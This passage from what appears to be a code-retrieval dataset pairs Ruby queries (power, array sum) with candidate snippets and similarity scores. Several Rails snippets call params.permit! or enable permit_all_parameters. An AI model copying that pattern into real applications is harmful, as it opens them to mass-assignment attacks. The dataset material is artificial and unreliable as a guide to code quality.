"def param_whitelist\n whitelist = [\n :description,\n :progress,\n :kpi_id\n ]\n \n unless action_name === 'create'\n whitelist.delete(:kpi_id)\n end\n \n whitelist\n end",
"def quote_params\n params.permit!\n end",
"def valid_params?; end",
"def paramunold_params\n params.require(:paramunold).permit!\n end",
"def user_params\n\t\tparams.permit(:nickname, :avatar, :description, :password, :gender, :birthday, :email, :phone, :qq_id, :wechat_id)\n\tend",
"def filtered_parameters; end",
"def user_params\n params.permit(\n \t:id,\n \t:email, \n \t:first_name, \n \t:last_name, \n \t:password, \n \t:confirm_token, \n \t:phone_number,\n \t:facebook_link,\n \t:car_model,\n \t:license_plate)\n end",
"def filtering_params\n params.permit(:email, :name)\n end",
"def check_params\n true\n end",
"def wx_public_params\n params.require(:wx_public).permit(:nickname, :manager, :alias)\n end",
"def allowed_params\n params.require(:user).permit(:email, :password, :role, :first_name, :last_name, :password_confirmation)\n end",
"def allowed_params\n params.require(:user).permit(:email, :password, :role, :first_name, :last_name, :password_confirmation)\n end",
"def listing_params\n\t\tparams.permit(:address, :transit_info, :rules, :other_info, :lat, :lng)\n\tend",
"def social_account_params\n\t\t\tparams.require(:social_account).permit!\n\t\tend",
"def safe_params\n resurce_name = self.class.resource_name\n params_method_name = \"#{resurce_name}_params\".to_sym\n if params[resurce_name]\n if respond_to?(params_method_name) || private_methods.include?(params_method_name)\n send(params_method_name)\n else\n raise ActiveModel::ForbiddenAttributesError, \"Please, define the '#{params_method_name}' method in #{self.class.name}\"\n end\n end\n end",
"def url_params\n params.require(:url).permit(:short_url, :original_url, :clicks, :ip_addresses)\n end",
"def user_params\n params.require(:user).permit(:uri, :username, :password, :realname, :email, :publicvisible)\n end",
"def model_params\n\t\tparams.require(:manager).permit(\n\t :user_name,\n :password,\n :email,\n \t\t\t)\n\tend",
"def article_params_whitelist\n params.require(:article).permit(:title, :description, category_ids: [])\n end",
"def college_whitelist_params\n params.require(:college_whitelist).permit(:status)\n end",
"def active_code_params\n params[:active_code].permit\n end",
"def filtering_params\n params.permit(:email)\n end",
"def valid_params(params)\n params.permit(:user_id, :photo_id, :originX, :originY, :width, :height)\n end",
"def ip_address_params\n\t\t\tparams.require(:ip_address).permit!\n end",
"def pull_request_params\n whitelist = [\n :url,\n :id,\n :html_url,\n :diff_url,\n :patch_url,\n :issue_url,\n :number,\n :state,\n :locked,\n :title\n ]\n params.require(:pull_request).permit(whitelist)\n end",
"def reserved_params\n params.require(:reserved).permit(:name, :email, :pax, :address, :KTP, :title)\n end",
"def post_params\n if current_user.admin? \n params.permit(:title, :body, :city, :country, :gps_location, :privacy, :visible, :latitude, :longitude, images: [], files: [])\n else \n params.permit(:title, :body, :city, :country, :gps_location, :privacy,:latitude, :longitude, images: [], files: [])\n end \n end",
"def list_params\n params.permit(:name)\n end",
"def filter_parameters; end",
"def filter_parameters; end",
"def vineyard_params\n params.permit(:vineyard_name, :email, :website_url, :phone, :address, :city, :region, :postcode, :country, :specialty, :description, :pet_friendly, :holiday, :tours, :events, :family_friendly, :cover_image, :image_one, :image_two, :image_three, :image_four, :user_id, :base64)\n end",
"def available_activity_params\n # params.require(:available_activity).permit(:type,:geometry,:properties)\n whitelisted = ActionController::Parameters.new({\n type: params.require(:available_activity)[:type],\n geometry: params.require(:available_activity)[:geometry].try(:permit!).to_h,\n properties: params.require(:available_activity)[:properties].try(:permit!).to_h\n }).try(:permit!)\n end",
"def user_params\n params.permit(:name, :username, :email, :password, :img_url, :bg_url, :coinbank)\n end",
"def user_params_pub\n\t \tparams[:user].permit(:hruid)\n\t end",
"def user_params\n params.permit(:id, :email, :password, :nickname, :status, :avatar, :flat_picture, :flatsharing_id, :member,\n :user, :color, :solde)\n end",
"def validate_search_inputs\n @whitelisted = params.fetch(:user, nil)\n if @whitelisted.blank?\n render_error(400, \"#{I18n.t('general_error.params_missing_key')}\": [I18n.t('general_error.params_missing_value', model: \"review\")])\n return\n else\n @whitelisted = @whitelisted.permit(:name, :uen, :description)\n end\n end",
"def param_whitelist\n [\n :title,\n :description,\n :organization,\n :team_id,\n :started_at,\n :finished_at,\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n end",
"def url_whitelist; end",
"def admin_social_network_params\n params.require(:social_network).permit!\n end",
"def filter_params\n params.require(:filters).permit(:letters)\n end",
"def origin_params\n params.permit(:country, :state, :city, :postal_code, :address, :description)\n end",
"def valid_params(params)\n params.permit(:login, :first_name, :last_name, \n :password, :password_confirmation)\n end",
"def sensitive_params=(params)\n @sensitive_params = params\n end",
"def permit_request_params\n params.permit(:address)\n end",
"def user_params\n # Ensure a user can't give themselves admin priveleges\n params.delete(:admin) if current_user.admin?\n params.require(:user).permit(:name, :email, :admin, :image)\n end",
"def secure_params\n params.require(:location).permit(:name)\n end",
"def strong_params\n params.require( :setting ).\n permit( :global_scan_limit, :per_user_scan_limit,\n :target_whitelist_patterns, :target_blacklist_patterns )\n end",
"def question_params\n params.require(:survey_question).permit(question_whitelist)\n end",
"def case_insensitive_params\n params.require(:case_insensitive).permit(:name)\n end",
"def empire_master_no_match_params\n params.require(:empire_master_no_match).permit(:uid, :last_name, :list, :search_date, :double, :source)\n end",
"def maintenance_request_params\n params[:maintenance_request].permit! #allow all parameters for now\n end",
"def unwanted_params\n params.require(:unwanted).permit(:title, :description, :image)\n end",
"def url_params\n params[:url].permit(:full)\n end",
"def backend_user_params\n params.permit!\n end",
"def filter_params\n\t\treturn params[:candidate].permit(:name_for_filter)\n\tend",
"def speed_measurement_params\n\n #fuckit, to lazy to deal with permit crap right now\n ActionController::Parameters.permit_all_parameters = true\n\n params[:speed_measurement]\n end",
"def user_params\n params.permit(:name, :age, :username, :display_photo, :password)\n end",
"def get_params\r\n #params.require(:article).permit(:title, :permalink, :content, :source_site, :introtext, :type_id, :order_by, :searchable, :created_by, :edited_by, :published_by, :published_on, :user_id)\r\n params.require(:article).permit!\r\n\r\n end",
"def pub_params\n params.require(:pub).permit(:name, :description, :phone, :email, :hidden, :city_id, :address)\n end",
"def pass_params\n params[:pass].permit(:name, :price, :description, :colour, :events)\n end",
"def droptraining_params\n params.permit(:training_id,:user_id, :utf8, :authenticity_token, :commit)\n end",
"def person_params\n # params whitelist does *not* include admin, sub, remember_token\n # TBD: share this whitelist with the list used by configuration_permitted_parameters\n # TBD: should current_password be on this list? -- for now, leaving off, since it seems to work without\n # NOTE: do not include 'admin' in this list!\n params.require(:person).permit(\n :name, \n :email, \n :description,\n :password, \n :password_confirmation\n )\n end",
"def parameter_params\n params.require(:parameter).permit(:name, :description, :param_code, :param_value, :active_from, :active_to)\n end"
] |
[
"0.69792545",
"0.6781151",
"0.67419964",
"0.674013",
"0.6734356",
"0.6591046",
"0.6502396",
"0.6496313",
"0.6480641",
"0.6477825",
"0.64565",
"0.6438387",
"0.63791263",
"0.63740575",
"0.6364131",
"0.63192815",
"0.62991166",
"0.62978333",
"0.6292148",
"0.6290449",
"0.6290076",
"0.62894756",
"0.6283177",
"0.6242471",
"0.62382483",
"0.6217549",
"0.6214457",
"0.6209053",
"0.6193042",
"0.6177802",
"0.6174604",
"0.61714715",
"0.6161512",
"0.6151757",
"0.6150663",
"0.61461",
"0.61213595",
"0.611406",
"0.6106206",
"0.6105114",
"0.6089039",
"0.6081015",
"0.6071004",
"0.60620916",
"0.6019971",
"0.601788",
"0.6011056",
"0.6010898",
"0.6005122",
"0.6005122",
"0.6001556",
"0.6001049",
"0.59943926",
"0.5992201",
"0.59909594",
"0.5990628",
"0.5980841",
"0.59669393",
"0.59589154",
"0.5958826",
"0.5957911",
"0.5957385",
"0.5953072",
"0.59526145",
"0.5943361",
"0.59386164",
"0.59375334",
"0.59375334",
"0.5933856",
"0.59292704",
"0.59254247",
"0.5924164",
"0.59167904",
"0.59088355",
"0.5907542",
"0.59064597",
"0.5906243",
"0.5898226",
"0.589687",
"0.5896091",
"0.5894501",
"0.5894289",
"0.5891739",
"0.58860534",
"0.5882406",
"0.587974",
"0.58738774",
"0.5869024",
"0.58679986",
"0.5867561",
"0.5865932",
"0.5864461",
"0.58639693",
"0.58617616",
"0.5861436",
"0.5860451",
"0.58602303",
"0.5854586",
"0.58537364",
"0.5850427",
"0.5850199"
] |
0.0
|
-1
|
base and exponent and returns base raised to the exponent power. (No fair using Ruby's base exponent notation!).
|
def pow(base, exponent)
result = 1
exponent.times do
result = base.to_i * result
end
result
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def power(base, exponent)\n return nil if exponent < 0\n\n return 1 if exponent == 0\n\n value = base\n\n (exponent - 1).times do value *= base end\n\n value\nend",
"def power(base,exponent)\n\n return base ** exponent\nend",
"def pow(base, exponent)\n\n result = 1\n\n exponent.times do\n result = result * base\n end\n\n return result\n \n end",
"def power(base, exponent)\n result = 1\n exponent.times { result *= base }\n result\nend",
"def power(base, exponent)\n exponent <= 1 ? base : base * (power base, (exponent - 1))\nend",
"def pow(base,exponent)\n base**exponent\n end",
"def power(base, exponent)\n return (0...exponent).inject(1) { |memo| memo * base } if exponent >= 0\n (exponent...0).inject(1.0) { |memo| memo * 1/base }\nend",
"def power(base, exponent)\n total = 1\n\n # we don't actually need this\n # if exponent == 1\n # total = base\n # elsif exponent == 0\n # total = 1\n # end\n # But what if the exponent were negative?\n\n (exponent.abs).times do\n total = multiply(total, base)\n end\n\n if exponent < 0\n total = (1.0 / total).to_r\n end\n\n total\nend",
"def power(base, exponent)\n if !base.is_a?(Integer) || !exponent.is_a?(Integer)\n return nil\n else \n product = 1\n (1..exponent).each do\n product *= base\n end\n return product\n end\nend",
"def power(base, exponent)\n total = 1\n\n exponent.times do\n total *= base\n end\n\n return total\nend",
"def power(base, exp)\n return base ** exp\nend",
"def exponent_v1(base, power)\n return 1 if power <= 0\n base * exponent_v1(base, power-1)\nend",
"def exponent1(base, power)\n\treturn 1 if power == 0\n\tbase * exponent1(base, power - 1)\nend",
"def exponent_1(base, power)\n\treturn 1 if power == 0\n\tlesser_power = power - 1\n\tbase_to_the_lesser_power = exponent_1(base, lesser_power)\n\tbase * base_to_the_lesser_power\nend",
"def exp(base, exponent)\n return base if exponent == 1\n base * exp(base, exponent-1)\nend",
"def exponentiation(base, power)\n return 1 if power == 0\n base * exponentiation(base, power - 1)\nend",
"def power(base,exponent)\n i = 0\n output = 1\n while i < exponent\n output = output * base\n i += 1\n end\n return output\nend",
"def exp(base, exponent)\n return 1 if exponent.zero?\n\n base * exp(base, exponent - 1)\nend",
"def power(base, power)\r\n base ** multiply(power, 1)\r\nend",
"def power(base,exponent)\n i=1\n output = base\n while i<exponent\n output = output*base\n i += 1\n end\n return output\nend",
"def pow(base, exponent) #(3, 4) ==> 3 * 3 * 3 * 3 = \n return 1 if exponent == 0 \n #return base if exponent == 1\n base * pow(base, exponent - 1)\nend",
"def exp(base, power)\n return 1 if power == 0\n return base if power == 1\n base * exp(base, (power-1))\nend",
"def power(base, exponent)\n i = \n output = 1\n while i <= exponent\n output = output * base\n i += 1\n end \n return output\nend",
"def power(base, exp)\n i = 0\n output = 1\n\n while i < exp\n output *= base\n i += 1\n end\n return output\nend",
"def ui_pow(base, exp)\n result = 1;\n while (exp)\n if (exp & 1)\n result *= base\n end\n exp >>= 1;\n base *= base\n end\n if(exp==0)\n result=base\n end\n return result\nend",
"def power(base, power)\n base ** power\nend",
"def exponent1(base, num)\n return 1 if num == 0\n return base if num == 1\n x = base * exponent1(base, num-1)\n\nend",
"def exponent1(base, power)\n # if power equals zero , then 1 else (base * method(base,power - 1))\n if power == 0\n return 1\n else\n (base * exponent1(base, power - 1))\n end\nend",
"def rec_exp_1(base, power)\nend",
"def rec_exp_2(base, power)\nend",
"def exp1(base, power)\n return 1 if power <= 0\n exp1(base, power - 1) * base\nend",
"def power (num, exponent)\n if exponent == 0\n result = 1\n elsif exponent == 1\n result = num\n else\n result = multiply(num, num)\n (exponent-2).times { result = multiply(result, num) }\n result\n end\nend",
"def power(base, exponent)\n multiply = []\n exponent.times do\n multiply.push(base)\n end\n product = 1\n multiply.each { |i| product *= i}\n puts product\nend",
"def pow(base_num, pow_num)\n result = 1\n pow_num.times do |index|\n result = result * base_num\n end\n\n return result\nend",
"def pow base, p\n base ** p\n end",
"def power_of(num, exponent)\n product = multiply(num, num)\n \n (exponent - 2).times { product *= num }\n\n product\nend",
"def exp_r1 (base, exponent)\n if exponent == 0\n return 1\n else\n base * exp_r1(base, exponent - 1)\n end\nend",
"def exp1(base, power)\n return 1 if power == 0\n base * exp1(base, power - 1)\nend",
"def exp1(base, power)\n return 1 if power == 0\n base * exp1(base, power - 1)\nend",
"def powerI(power, base)\n acc = 1\n power.times { acc *= base }\n return acc\nend",
"def exponentiation(base, exp)\n return nil if exp < 0\n return 1 if exp == 0\n return base if exp == 1\n\n if exp.even?\n (exponentiation(base, exp / 2)**2)\n else\n base * (exponentiation(base, (exp - 1) / 2)**2)\n end\nend",
"def pow(base_num, pow_num)\n result = 1\n pow_num.times do\n result = result * base_num\n end\n return result\nend",
"def power(bas,exponent)\n i = 1\n resultat = bas\n while i < exponent\n resultat *= bas\n i += 1\n end\n return resultat\nend",
"def exp(number, exponent)\n number * (10**exponent)\nend",
"def power_digit_sum(base, exponent)\n\t(2 ** 1000).to_s.split(\"\").inject(0) {|sum, n| sum + n.to_i}\nend",
"def power_of_n(num, exponent)\n num ** exponent\nend",
"def power(num, exponent)\n result = num\n (2..exponent).each { result = multiply(result, num) }\n result\nend",
"def pow (base_num , pow_num)\n results=1\n pow_num.times do \n results*=base_num\n end \n results\nend",
"def calculate_exponent(num, exp)\n\treturn num ** exp\nend",
"def power(num, power)\n\tnum**power\nend",
"def exponentiation_one(base, exp)\n return nil if exp < 0\n return 1 if exp == 0\n return base if exp == 1\n\n base * exponentiation_one(base, exp - 1)\nend",
"def exp(base,exponent)\n p exponent\n return 1 if exponent == 0\n return base if exponent == 1\n if exponent.even?\n result = exp(base,exponent/2)\n result * result\n else\n result = exp(base,(exponent-1)/2)\n base * (result * result)\n end\n\n\nend",
"def exponent; end",
"def exponentiate(number, power)\n power = power.to_int\n puts \"#{number} ** #{power} = #{number ** power}\\n\"\nend",
"def exponent(b, n)\n\nend",
"def exponent(b, n)\n\nend",
"def exponent(b, n)\n\nend",
"def power(number, exponent)\n i = 0\n output = 1\n new_exponent = exponent.round\n if new_exponent < 0\n output = 1/power(number,(new_exponent * -1)).to_f\n return output\n end\n if new_exponent == 0\n return output\n end\n while i < new_exponent\n output = output * number\n i += 1\n end\n return output\nend",
"def power(num, power)\r\n num ** power\r\nend",
"def pow(base, y)\n result = 1\n for i in 0..(y - 1)\n result = result * base\n end\n puts \"\\n#{base}^(#{y}) = #{result}\\n\"\n end",
"def exp1(base, num)\n return 1 if num == 0\n return base if num == 1\n expo = base * exp1(base, num-1)\nend",
"def convert_base(number, base)\n \n exponents = []\n n = 0 # Exponent / number position\n\n # Find the appropriate exponent size larger than the number \n while number != 0\n # puts \"Current top number: #{number}\"\n # puts \"Current exponent value: #{n}\"\n running_total = 0\n if number < base ** n\n # puts \"Base ** n: #{base ** n}\" \n # puts \"If loop current number: #{number}\"\n running_total += base ** (n-1)\n # puts \"If loop running_total: #{running_total}\"\n number = number - running_total\n # puts \"If loop number after subtraction: #{number}\"\n if exponents[n-1].nil? then exponents[n-1] = 1 else exponents[n-1] += 1 end\n n = 0\n else\n n += 1\n end\n end\n\n exponents.inspect\n\nend",
"def power(curr_value, to_power)\n curr_value**to_power\nend",
"def power_digit_sum(base, exponent)\n # 1) calculate the power\n power = base ** exponent\n sum = 0\n\n # 2) convert to string to iterate each digit\n len = power.to_s.length\n for index in (0...len)\n # 3) convert back to number to calculate sum\n sum += power.to_s[index].to_i\n end\n\n # 4) return sum\n return sum\nend",
"def power(a, b)\n return a**b\nend",
"def exponent(a=1, x)\n\ta*(Math::E**x)\nend",
"def power(num1, num2)\n return num1**num2\nend",
"def power(num1, num2)\n return num1**num2\nend",
"def exp2(base, power)\n return 1 if power == 0\n half = exp2(base, power / 2)\n\n if power.even?\n half * half\n else\n # note that (power / 2) == ((power - 1) / 2) if power.odd?\n base * half * half\n end\nend",
"def power(a,b)\n a.to_i ** b.to_i\nend",
"def exp2(base, power)\n return 1 if power == 0\n\n half = exp2(base, power / 2)\n\n if power.even?\n half * half\n else\n # note that (power / 2) == ((power - 1) / 2) if power.odd?\n base * half * half\n end\nend",
"def rpower(n) end",
"def power_sig_exp(b, x)\n l10 = x / Math.log(10, b)\n log10_sig_exp(l10)\nend",
"def power(n1, n2)\n return n1**n2\nend",
"def exp_v_1(num, pow)\n return 1 if pow === 0\n return num * exp_v_1(num, pow - 1)\nend",
"def recursive_exponent_1(base, exponent)\n puts \"#{__method__} called\"\n return 1 if exponent.zero?\n base * recursive_exponent_1(base, exponent - 1)\nend",
"def power(nb1, nb2)\n return nb1 ** nb2\nend",
"def power(b, n)\n\n\t# b^n.to_i\n\n\tb ** n\n\nend",
"def decimal_base(n)\n 10**(n-1)\nend",
"def exponent\n e = @exp\n digs = @digits\n unless digs == 0\n e += digs.__decimal_digits_length_approx(false)\n end\n e\n end",
"def #power(a,b)\n\ta ** b\nend",
"def power (n1, n2)\n\tn = n1 ** n2\n\treturn n\nend",
"def power (*base_and_power)\n base_and_power.inject(:**)\nend",
"def power(n1, n2)\n n1 ** n2\nend",
"def exponentm(num_1,num_2)\n return num_1 ** num_2\nend",
"def exponent(b, n)\n return b if n == 1\n return 1 if n == 0\n if n >= 0\n exponent(b, n-1) * b\n else\n (1.0/b) * exponent(b, n+1)\n end\n end",
"def exp1(base, power)\n puts \"exp1\"\n return 1 if power == 0\n base * exp1(base, power - 1)\nend",
"def raise_to_power(x, y)\n #every shift left is like a * 2\n #11000\nend",
"def pow(a,b)\n power=1\n for i in 1..b\n power=power*a\n end\n return power\nend",
"def powers(base, limit)\n 0.upto(Math.log(limit)/Math.log(base)) {|x| yield base ** x}\nend",
"def exponent(b, n)\n return 1 if n == 0\n if n > 0\n b * exponent(b, n - 1)\n else\n 1.0/b * exponent(b, n + 1)\n end\nend",
"def exponent(b, n)\n return 1 if n == 0\n if n > 0\n b * exponent(b, n - 1)\n else\n 1.0/b * exponent(b, n + 1)\n end\nend",
"def exponent(b, n)\n return 1 if n == 0\n\n if n > 0\n b * exponent(b, n - 1)\n else\n 1.0/b * exponent(b, n + 1)\n end\nend",
"def exp2(base, num)\n return 1 if num == 0\n return base if num == 1\n if num % 2 == 0\n expo = exp(base, num/2)\n else\n expo = exp(base, (num-1)/2)\n end\nend",
"def exp_ver_two(base, exponent)\n return 1 if exponent.zero?\n\n if exponent.even?\n n = exp_ver_two(base, exponent / 2)\n n * n\n else\n n = exp_ver_two(base, (exponent - 1) / 2)\n base * (n * n)\n end\nend",
"def power(n1, n2)\r\n n1.to_i ** n2.to_i\r\nend",
"def exp1(num, exponent)\n return 1 if exponent == 0\n # return ( 1 / exp1(num, exponent - 1) )\n\n num * exp1(num, exponent - 1)\nend",
"def exponent(a, b)\n return 1 if b.zero?\n\n array_of_values = []\n\n b.abs.times do\n array_of_values.push(a)\n end\n\n calculated_multiplier = array_of_values.reduce(:*)\n\n b > 0 ? calculated_multiplier : \"1/#{calculated_multiplier}\"\nend",
"def mod_pow(base, power, mod)\n result = 1\n while power > 0\n result = (result * base) % mod if power & 1 == 1\n base = (base * base) % mod\n power >>= 1;\n end\n result\nend",
"def power(num,pow)\n if pow == 0\n num\n else\n total = 1\n count = 0\n while count < pow\n total *= num\n count += 1\n end\n return total\n end\nend"
] |
[
"0.85367644",
"0.83835316",
"0.8346648",
"0.8328984",
"0.8320955",
"0.8299144",
"0.8173997",
"0.8119814",
"0.8064917",
"0.80615014",
"0.799997",
"0.79420173",
"0.7905454",
"0.7864293",
"0.7832552",
"0.78028375",
"0.77335674",
"0.7729772",
"0.7720525",
"0.7629144",
"0.7587631",
"0.75224316",
"0.75220996",
"0.75104916",
"0.74336636",
"0.74177545",
"0.7401962",
"0.7397249",
"0.736385",
"0.73291665",
"0.72643876",
"0.72304845",
"0.71569663",
"0.714212",
"0.71367276",
"0.7129801",
"0.7096157",
"0.70761293",
"0.70541507",
"0.70501876",
"0.70473546",
"0.7017277",
"0.70104784",
"0.6984732",
"0.6979316",
"0.6951182",
"0.69080687",
"0.69079345",
"0.68879896",
"0.68791616",
"0.68706334",
"0.68472624",
"0.6836052",
"0.68211895",
"0.6754527",
"0.6754527",
"0.6754527",
"0.6745633",
"0.67150277",
"0.66815716",
"0.66730875",
"0.66675776",
"0.66622806",
"0.66495657",
"0.66445374",
"0.6614588",
"0.66090333",
"0.66090333",
"0.6604281",
"0.65640855",
"0.65514517",
"0.6527223",
"0.652515",
"0.65214735",
"0.651822",
"0.6510254",
"0.64997405",
"0.64807075",
"0.64768535",
"0.64732736",
"0.6467741",
"0.64591914",
"0.6451282",
"0.64423007",
"0.6422822",
"0.64188904",
"0.6417424",
"0.64010173",
"0.6400539",
"0.6399776",
"0.6393711",
"0.6393711",
"0.6392004",
"0.63825274",
"0.638084",
"0.63638693",
"0.63609284",
"0.6346483",
"0.6342369",
"0.63287675"
] |
0.80038184
|
10
|
Write a method, sum which takes an array of numbers and returns the sum of the numbers.
|
def sum(array)
y = 0
array.each do |x|
y += x
end
y
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def sum_array(numbers)\n return numbers.sum()\nend",
"def sum_array(array)\n array.sum\nend",
"def sum_array(array)\n array.sum\nend",
"def sum(array)\n array.sum\nend",
"def sum(array_of_integers)\n # TODO\nend",
"def sum_array(array)\n the_sum_of_array = array.sum\n the_sum_of_array\nend",
"def sum(array)\n\tarray.reduce(:+)\nend",
"def sum_array(array)\n array.reduce(:+)\nend",
"def sum_array(array)\n sum = 0\n\n array.each do |number|\n sum += number\n end\n\n return sum\nend",
"def sum(array)\n\treturn array.reduce(:+)\nend",
"def sum_array(array)\n sum = 0\n array.each do |number|\n sum += number\n end\n sum\nend",
"def sum_array(array)\n sum = 0\n array.each do |num|\n sum = sum + num\n end\n sum\nend",
"def array_sum(arr)\n arr.reduce(:+)\nend",
"def array_sum(arr)\n arr.reduce(:+)\nend",
"def sum_array(array)\n return array.sum\n\n # sum_total_of_array = 0\n # for number in array\n # sum_total_of_array += number\n # end\n # return sum_total_of_array\nend",
"def sum_array(array)\n sum = 0\n array.each do |x|\n sum += x\n end\n return sum\nend",
"def sum_array(array)\n # Your code here\nend",
"def sum_array(array)\n sum = 0\n array.each do |num|\n sum += num\n end\n sum\nend",
"def sum array\n\tsum = 0\n\tarray.each do |number|\n\t\tsum = sum + number\n\tend\n\tsum\nend",
"def array_sum(arr)\n arr.reduce(:+)\n\nend",
"def sum_array(array_num)\n\nend",
"def sum_array(integers)\n integers.sum\nend",
"def sum_array(array)\n sum = 0\n array.each{ |num| sum += num }\n sum\nend",
"def sum_array(array)\n sum = 0\n array.each do |value|\n sum += value\n end\n sum\nend",
"def sum_array(array)\n\tarray.inject { |sum, n| sum + n }\nend",
"def sum(array)\n sum = 0\n\n array.each { |number|\n sum += number\n }\n\n return sum\nend",
"def sum_array(array)\n\tarray.inject do |sum, n| sum + n\n\tend\nend",
"def sum_of_sums(array)\r\nend",
"def sum_array(array)\n total = 0\n array.each do |num|\n total += num\n end\n total\nend",
"def sum_array(array)\n sum = 0\n array.each do |num|\n sum+=num\n end\n sum\nend",
"def sum(array)\n\ttotal = 0\n\tfor number in array #could do each do instead of for loop\n\t\ttotal += number\n\tend\n\treturn total\nend",
"def sum_array(array)\n sum = 0\n array.each do |element|\n sum += element\n end\n sum\nend",
"def sum(array)\n sum = 0\n array.each do |num|\n sum += num\n end\n sum\nend",
"def sum(array)\n sum = 0\n array.each do |a|\n sum += a\n end\n return sum\nend",
"def total(array)\n array.sum\nend",
"def array_sum(arr)\n arr.reduce(0, :+)\nend",
"def array_sum(arr)\n arr.reduce(0, :+)\nend",
"def array_sum(arr)\n arr.reduce(0, :+)\nend",
"def sum arr\n #this is slightly too easy...\n arr.sum\nend",
"def array_sum(arr)\n return arr.reduce(0, :+)\nend",
"def sum arr\n sum = arr.sum\n return sum\nend",
"def sum_array(int_array)\n int_array.reduce(:+)\nend",
"def my_sum(array)\n sum = 0\n array.each do |num|\n sum += num\n end\n sum\nend",
"def sum_array(array)\n sum = 0\n array.each do |i|\n sum+=i\n end\n sum\nend",
"def sum_array(numbers)\n total = 0\n for number in numbers\n total = total + number\n end\n return total\nend",
"def sum(array)\n array.inject(0){|sum, n| sum + n}\n end",
"def array_sum(array)\r\n array.inject(0, :+)\r\nend",
"def sum1(array)\r\n sum = 0\r\n array.each do |number|\r\n sum += number\r\n end\r\n sum\r\nend",
"def simple_array_sum arr\n arr.reduce(:+)\n end",
"def sum(array)\n sum = 0\n array.each { |n| sum += n } \n sum\nend",
"def sum(array)\n array.map(&:to_i).reduce(0, :+)\nend",
"def simpleArraySum(ar)\n ar.sum\nend",
"def it_arr_sum(array)\r\n sum = 0\r\n array.each {|ele| sum += ele}\r\n return sum\r\nend",
"def simpleArraySum(ar)\n ar.sum\nend",
"def sum(array)\n array.reduce(0) {|sum, num| sum += num}\nend",
"def sum_array(any_array)\n any_array.inject(:+)\n end",
"def sum_of_sums(array)\n sum = 0\n sum_array = array.map { |x| sum += x }\n sum_array.inject(:+)\nend",
"def sum (array)\n y=array.inject(:+).to_i\nend",
"def sum(array)\n return array.inject(0, &:+)\nend",
"def array_sum(arr)\n\n sum = 0\n arr.each {|n| sum += n}\n\n sum\nend",
"def sum_array( numbers )\r\n numbers.inject(0, :+)\r\nend",
"def sum_array(array)\n array.inject { |sum,n| sum + n }\nend",
"def simpleArraySum(ar)\n return ar.map(&:to_i).sum\nend",
"def total (array)\n sum = 0\n array.each do |i|\n sum + i\n end\n return sum\nend",
"def arr_sum(array)\n sum = 0 # Declares initial value for variable 'sum' as 0\n array.each do |i| # Begin iterating each item of arr\n sum += i # add each number in array to the next item, continue until items exhausted\n end\n return sum # Returns new sum value\nend",
"def array_sum(arr)\n arr.reduce(0) {|sum, el| sum + el}\nend",
"def sum_array(array)\n array.inject { |sum, x| sum + x }\nend",
"def sum(array)\n\tanswer = 0\n\tif array.length > 0 then\n\t\tarray.each {|x| answer += x}\n\telse\n\t\treturn 0\n\tend\n\treturn answer\nend",
"def sum (arr)\n\treturn arr.inject(0, :+)\nend",
"def total(array)\n sum = 0\n array.each do |x|\n sum = sum + x\n end\n sum\nend",
"def sum(arr)\n arr.inject(:+)\nend",
"def sum(theArray)\n\ttotal = 0\n\ttheArray.each do |i|\n\t\ttotal = total + i\n\tend\n\treturn total\nend",
"def add_array_numbers(array)\n result = array.sum\n # .sum cannot be used on a string, only integars and floats\n return result\nend",
"def total(array)\n sum = 0\n array.each do |number|\n sum = sum += number\n end\n sum\nend",
"def sum(array)\n s = 0\n\tarray.each {|x| s+= x}\n\ts\nend",
"def sum(array)\n return 0 if array.empty?\n array.inject(:+)\nend",
"def sumArray(array)\n sum = 0\n array.each do\n |n|\n sum += n.to_i\n end\n puts \"Somme : #{sum}\"\nend",
"def total(array_of_numbers)\n sum = 0\n array_of_numbers.each do |num|\n sum += num\n end\n return sum\nend",
"def sum(array)\n array.inject(0, :+)\nend",
"def total(array)\n sum = array.inject(:+)\n sum\nend",
"def sum_array(array)\n array.inject do |sum, n|\n sum + n\n end\nend",
"def array_sum(arr)\n\tsum = 0\n\n\t# an for each loop\n\tfor i in arr\n\t\tsum += i\n\tend\n\t\n\treturn sum\n\t\nend",
"def total(array)\n sum = 0\n array.each do |num|\n sum += num\n end\n return sum\nend",
"def sum_array(array)\n #array.inject(0){|sum,x| sum + x }\n array.inject(0){|sum,x| sum + x }\nend",
"def sum(in_array)\n return 0 if in_array.length == 0\n return in_array.reduce(:+)\nend",
"def total(array_of_numbers)\n return array_of_numbers.reduce(:+)\nend",
"def sum(array)\n array.reduce(0) {|base, ele|\n base+=ele\n }\n end",
"def sum arr\n # YOUR CODE HERE\n total = arr.sum\n \n return total\nend",
"def total(array)\n sum = 0\n array.each do |n|\n sum += n\n end\n sum\nend",
"def total(array)\n\tsum = 0\n\tarray.each do |x|\n\t\tsum = sum + x\n\tend\n\tsum\nend",
"def sum_array(array)\nsum = 0\n for i in 0..array.length-1\n sum = sum+ array[i]\n end\n return sum\nend",
"def array_sum(arr)\n if arr.length == 0\n return 0\n end\n arr.reduce(:+)\nend",
"def sum(arr)\n arr.reduce(0, :+)\nend",
"def simpleArraySum(ar)\n #\n # Write your code here.\n #\n ar.reduce(&:+)\nend",
"def sum_array (arr)\n result = 0\n arr.each do |value|\n result +=value\n end\n result\nend",
"def array_sum(arr)\n return 0 if arr.empty?\n arr.reduce(:+)\nend",
"def array_sum(arr)\n return 0 if arr.empty?\n arr.reduce(:+)\nend",
"def array_sum(arr)\n return 0 if arr.empty?\n\n arr.reduce(&:+)\nend",
"def sum_of array\n# add the numbers of the array, these are three different ways I found\n array.inject{ |sum, value| sum += value}\n # or\n # array.map(&:to_i).reduce(0, :+)\n # or\n # array.sum\nend",
"def sum_upon_sums(array)\n\nend",
"def get_sum(array)\n return array.inject (0) { |sum, n| sum + n }\nend"
] |
[
"0.8819229",
"0.8741331",
"0.8724715",
"0.86748266",
"0.8614597",
"0.8563894",
"0.8530244",
"0.8503776",
"0.8475847",
"0.8460066",
"0.8451358",
"0.84347755",
"0.8431987",
"0.8431987",
"0.8431652",
"0.8411252",
"0.8402997",
"0.8394949",
"0.8384007",
"0.8373476",
"0.8366921",
"0.8359736",
"0.8351837",
"0.83495414",
"0.8342264",
"0.83414763",
"0.83398837",
"0.83290505",
"0.83187103",
"0.8310578",
"0.829937",
